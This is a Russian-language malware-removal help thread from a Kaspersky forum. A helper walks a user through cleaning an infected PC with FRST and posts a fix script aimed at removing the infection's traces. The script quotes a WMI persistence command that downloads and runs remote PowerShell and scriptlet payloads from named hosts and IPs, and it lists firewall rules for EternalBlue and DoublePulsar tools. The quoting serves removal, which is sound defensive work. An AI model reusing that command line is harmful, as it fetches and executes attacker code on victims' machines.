Перейти к содержанию
Правила раздела
19 лет клубу! Встречаемся в офисе «Лаборатории Касперского»

кто-то установил RDP на пк

ArCtic

Автор ArCtic
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Sandor

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Проблему опишите, пожалуйста, подробнее, в чем именно выражается.

 

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям.
В результате работы утилиты появится отчёт AV_block_remove.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

Ссылка на комментарий
Поделиться на другие сайты
ArCtic

ArCtic

Опубликовано
  • Автор
Опубликовано

Заметил на диске С: папку "левую" (уже удалилась после AV block remover) там, что-то про rdp было. Посмотрел в администрировании в пользователях пользователь новый, его удалил. Попытался касперского установить free  - не устанавливается. Поэтому решил к профессионалам обратиться.

CollectionLog-2021.10.04-14.32.zip AV_block_remove.log

Ссылка на комментарий
Поделиться на другие сайты
Sandor

Sandor

Опубликовано
Опубликовано

Теперь понятно :)

 

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

 

Файл

Цитата

C:\Users\MLP\desktop\aa_v3.exe

вам известен? Это тоже программа удалённого управления AmmyAdmin.

Ссылка на комментарий
Поделиться на другие сайты
Sandor

Sandor

Опубликовано
Опубликовано

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код: 
    Start::
SystemRestore: On
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {1a17073d-48c6-11e6-bdd0-364b50b7ef2d} - E:\SISetup.exe
HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {83d7d827-00ff-11e9-8be5-364b50b7ef2d} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {d0bcfb0f-2905-11e6-b90f-d8cb8ae0fe7d} - "I:\Install MegaFon Internet.exe"
2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\kz.exe
2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\lsass.exe
2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\lsass2.exe
2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\olly.exe
2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\script.exe
2021-01-04 10:43 C:\Program Files (x86)\Zaxar
2021-01-04 10:43 C:\Windows\boy.exe
2021-01-04 10:43 C:\Windows\java.exe
2021-01-04 10:43 C:\Windows\svchost.exe
2021-01-04 10:43 C:\Windows\SysWOW64\Drivers\conhost.exe
2021-01-04 10:43 C:\ProgramData\Driver Foundation Visions VHG
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"topx4\"",Filter="__EventFilter.Name=\"topx3\"::
WMI:subscription\__EventFilter->topx3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 11000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->topx4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.dasxost.com:8080/power.txt')||regsvr32 /u /s /i:http://185.26.115.40:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://185.26.115.144:8220/s.xsl"]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
FirewallRules: [{24F5AB21-FD6B-4800-88E4-AF6A887D4F97}] => (Allow) C:\ProgramData\WindowsTask\MicrosoftHost.exe => Нет файла
FirewallRules: [{0CC96BE1-E966-4ADE-B25B-80542EBADB5E}] => (Allow) C:\ProgramData\WindowsTask\AppModule.exe => Нет файла
FirewallRules: [{31732C49-DC53-4085-B207-84E186F421FE}] => (Allow) C:\ProgramData\WindowsTask\AMD.exe => Нет файла
FirewallRules: [{2DAAC257-3DF8-4919-BAED-196D7A532C9A}] => (Allow) C:\ProgramData\WindowsTask\MicrosoftHost.exe => Нет файла
FirewallRules: [{7BDFDB76-754B-4D35-93DD-B98F12A34D38}] => (Allow) C:\ProgramData\WindowsTask\AppModule.exe => Нет файла
FirewallRules: [{45C49E5A-2858-41B4-81B0-A089019CB5D4}] => (Allow) C:\ProgramData\WindowsTask\AMD.exe => Нет файла
FirewallRules: [{68DC5587-D66F-4512-B002-9788A6A41F00}] => (Allow) C:\ProgramData\RealtekHD\taskhostw.exe => Нет файла
FirewallRules: [{E57F64A7-AA55-4488-A5D8-ECDB4003D773}] => (Allow) C:\ProgramData\rundll\system.exe => Нет файла
FirewallRules: [{A9AD11A1-29A5-4A5C-91EA-F4527C1C8D63}] => (Allow) C:\ProgramData\rundll\rundll.exe => Нет файла
FirewallRules: [{D90D92D7-4D88-4B2B-A141-916A875E0B54}] => (Allow) C:\ProgramData\rundll\Doublepulsar-1.3.1.exe => Нет файла
FirewallRules: [{C583528B-9C13-45EA-A6AD-EC7613BD082B}] => (Allow) C:\ProgramData\rundll\Eternalblue-2.2.0.exe => Нет файла
FirewallRules: [{16B70809-10D7-48CB-A52D-01D477548D3E}] => (Allow) LPort=9494
FirewallRules: [{23908275-A1BE-41BE-8688-7D75BC4550F5}] => (Allow) LPort=9393
FirewallRules: [{1339B6CC-2275-4060-9113-2C024E11A1E8}] => (Allow) LPort=9494
FirewallRules: [{5FED84C7-E9C8-42EF-94DC-60E9BE8AE912}] => (Allow) LPort=9393
EmptyTemp:
Reboot:
End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты
Sandor

Sandor

Опубликовано
Опубликовано

Если проблема решена, в завершение:

 

1. Выполните процедуру, описанную на этой странице.
Ссылку на результат анализа приведите здесь, пожалуйста.

 

2.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

3.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

Ссылка на комментарий
Поделиться на другие сайты
Sandor

Sandor

Опубликовано
Опубликовано

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
Дата установки обновлений: 2018-04-30 09:14:55
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.7.1 v.4.7.02558 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
Total Commander v.8.51 Внимание! Скачать обновления
WinRAR 5.31 (64-разрядная) v.5.31.0 Внимание! Скачать обновления
------------------------------- [ Browser ] -------------------------------
Google Chrome v.94.0.4606.61 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Google Chrome!^
Opera Stable 65.0.3467.78 v.65.0.3467.78 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
Opera Stable 79.0.4143.50 v.79.0.4143.50 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
 

Особенно обратите внимание на Контроль учетных записей и постарайтесь установить все хотфиксы. Иначе рискуете снова заразиться.

 

Читайте Рекомендации после удаления вредоносного ПО

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Вадим666
      проблема с RDP
      Автор Вадим666
      По рдп не пускает на сервер пишет Попытка входа неудачна
      это с компа на котором делали чистку с других пк на него заходит без проблем, с этого же компа на котором проводилась чистка на другие сервера заходит проблема
      Также при копировании пароля и вставки его в пароль РДП сам текст задваивается. Пример копируем пароль 123456 вставляем его в место пароля для рдп получаем 123456123456  
    • Ashton
      Плагин kaspersky password на опере не удается установить
      Автор Ashton
      Не могу поставить плагин kaspersky password на оперу на мак. Ставлю плагин от хрома, плагин говорит: если приложение установлено, удалите его и поставьте заново. Удаляю, ставлю — без измнений. Удаляю через сторонние приложения, ставлю заново, теперь kaspersky password просит залогинится. Логинюсь, но плагин как не работал, так и не работает.
       
       
    • kirill1121
      установил анидеск с левого сайта и в диспетчере задач проводник показывается как ярлык яндекс
      Автор kirill1121
      не знаю вирус ли но возможно майнер. скачивал вот с этого сайта https://remote-client.ru/?utm_source=direct&utm_medium=cpc&utm_campaign=anydesk&utm_content=0&utm_term=---autotargeting&yclid=200680025329867161

    • Земеля
      [РЕШЕНО] Вирус Майнер закрывает вкладки окна и все прочее. Не даёт установить rogue killer
      Автор Земеля
      Столкнулся впервые с майнером, который блокирует любые мои действия. Смог запустить Dr web cureit но не помогло, после удаления все равно все закрывается, если после перезагрузки снова запускать Dr web, то снова выскакивает троян с майнером. Помогите, пожалуйста 
    • ВладиславFox
      KSMG как установить (а точнее интегрировать) с уже работающей почтой, на одном сервере, без виртуалок.
      Автор ВладиславFox
      Звиняюсь за форму подачи информации (это был запрос в поддержку, помощи по которому я жду уже второй день, а сроки горят)
      Если кто то ставил уже ksmg не как отдельную систему (физическую или логическую), а интегрированно в сам почтовый сервер физический/логический (одна и та же ос, без виртуалок, гипервизоров и тд) прошу подсказать.


      Не видит постфикс на шаге интеграции с почтовым сервером
      предлогает только ручную интеграцию (которая не описана в инструкции)

      Пункт инструкции:
      Если Postfix отсутствует в списке доступных почтовых серверов для интеграции, но при этом он установлен на сервере, необходимо вернуть конфигурационный файл /etc/postfix/master.cf в исходное состояние и повторно запустить скрипт первоначальной настройки.

      Проблема в том что мы не изменяли конфигурационный файл.


      (напоминание ос Debian 12, почтовое решение Iredmail, postfix, dovecoat, sogo, nginx, clamav -шли одним установочным комплектом. Требуется чтоб антивирусное решение Касперсокого (KMSG) стояло на том же сервере, в той же системе и защищало почту)
      Выполненые шаги скрипта установки:
      Select web server [1]:
      [1] Nginx
      [2] Abort setup
      > 1

      Setup will use the following web server configuration:
      | type: Nginx
      | config_dir: /etc/nginx
      | config_file: nginx.conf
      | systemd_name: nginx
      | binary_name: /usr/sbin/nginx
      | sites_dir: /etc/nginx/conf.d
      | user: www-data
      Continue setup using this configuration? [1]:
      [1] Continue setup
      [2] Abort setup
      > 1

      Specify IP address of the current node
      The IP address will be used to communicate with other nodes [10.10.0.10]:
      >

      Specify the port number of the current node
      The port number will be used to communicate with other nodes [9045]:
      >

      Specify the port number of the current node for web interface
      The port number will be used to access KSMG web interface [443]:
      >
      Port 443 is already in use.

      Specify the port number of the current node for web interface
      The port number will be used to access KSMG web interface [443]:
      > 445

      Select MTA [1]:
      [1] Manual integration
      Note that by selecting "Manual integration", you will skip automatic integration with an MTA, so you will have to change the MTA configuration files manually.
      > 1

      при запуске всех служб ksmg отключаются все системы удаленного управления cockpit/webmin, так и должно быть ?
      но прописанный в скрипте установке порт веб интерфейса ksmg (в нашем случае 445) ничего не выводит ни удаленно, ни с самого сервера.

      среди ошибок есть что то про лицензию (как и куда прописать код нашей лицензии)

      и все та же проблема что пр установке скрипт, не видит почтового сервера(ПО) postfix, только мануальная интеграция. как говорил ранее мы не меняли конфиг постфикса, он изначально шел комплектом с кучей других пакетов (и они уже интегрированы друг в друга).

      напомню нашу ситуацию
      у нас всего один сервер и одна ос (никаких вирутальных машин, гипервизоров, кластеров)
      и почтовый сервер и ksmg должны стоять на одном и том же сервере и в одной и той же ос.
      setup-250415-102638.log traceback-250415-105029.txt master.txt
×
×
  • Создать...